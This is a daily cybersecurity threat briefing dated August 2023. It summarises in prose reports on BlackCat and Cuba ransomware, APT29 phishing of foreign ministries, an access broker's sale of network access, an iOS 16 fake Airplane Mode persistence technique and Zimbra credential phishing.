We use cookies to improve your experience. Do you accept?

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Aug 18, 2023

The BlackCat ransomware has evolved its tactics, with a new version noticed by Microsoft experts recently. This version incorporates Impacket and a PsExec-like tool called Remcom for lateral movement and remote code execution on compromised networks. Another unidentified threat group used a mass-spreading technique against Zimbra Collaboration users to steal credentials. The campaign, active since April, has been targeting small-medium businesses and government entities.

In a different development, researchers crafted an attack scenario for iOS 16 devices, creating a synthetic Airplane Mode to remain undetected. Apple clarified that this doesn't exploit a specific vulnerability but is a method for persistence after the initial compromise.

Top Breaches Reported in the Last 24 Hours

APT29 targets NATO-aligned MoFA

Researchers at EclecticIQ encountered an attack campaign by the Russia-linked APT29, targeting Ministries of Foreign Affairs of NATO-aligned countries. The group used PDF files masquerading as communications from the German embassy. The PDFs contained diplomatic invitation lures, with one delivering a variant of the Duke malware. The second PDF was presumably used for reconnaissance, to notify the attackers whether a victim opened the message.

Access major auction house network for $120,000

Initial Access Brokers (IABs) breached a major auction house's network and are offering access to the compromised network for $120,000, according to researchers at threat intelligence company Flare. The IAB advertisements on the forum, between May 1 and July 27, show over 100 companies were targeted across 18 industries, with organizations in the U.S., Australia, and the U.K being the most common targets. The finance and retail sectors accounted for the most number of attacks.

Top Malware Reported in the Last 24 Hours

New BlackCat ransomware variant surfaces

Microsoft uncovered a new version of the BlackCat ransomware, which incorporates tools like Impacket and RemCom to facilitate lateral movement and remote code execution. Impacket, a toolset for network protocol research and penetration testing, and RemCom, an open-source alternative to PsExec, facilitate ransomware deployment and remote access within the compromised network.

Cuba operators exploit Veeam flaw

The Cuba ransomware group has been seen deploying a comprehensive toolset, including BUGHATCH (a custom downloader), BURNTCIGAR (an antimalware killer), Wedgecut (a host enumeration utility), Metasploit, and Cobalt Strike frameworks. The criminals used a couple of exploits - Veeam Backup & Replication vulnerability (CVE-2023-27532) and the ZeroLogon bug (CVE-2020-1472) against critical Infrastructure sector in the U.S. and Latin America-based IT integrator.

Top Vulnerabilities Reported in the Last 24 Hours

Post-exploit persistence technique on iOS 16

Researchers from Jamf Threat Labs found a new post-exploit persistence technique on iOS 16 that allows attackers to maintain access to an Apple device even when the victim believes it is in Airplane Mode. Through this technique, the attacker remains hidden while maintaining a cellular network connection for a malicious application. By blocking cellular data access for specific apps and altering the alert window to appear as if Airplane Mode is enabled, attackers can create an artificial Airplane Mode that hides their activities and maintains connectivity for their rogue application.

Top Scams Reported in the Last 24 Hours

Phishing campaign steals Zimbra credentials

ESET uncovered an ongoing phishing campaign targeting Zimbra Collaboration users, aiming to harvest their account credentials. The phishing emails lure victims by posing as email server updates, account deactivations, or similar issues, and directing them to click on an attached HTML file. The file opens a fake Zimbra login page designed to collect credentials, which are then exfiltrated to a server controlled by the attackers.

Related Threat Briefings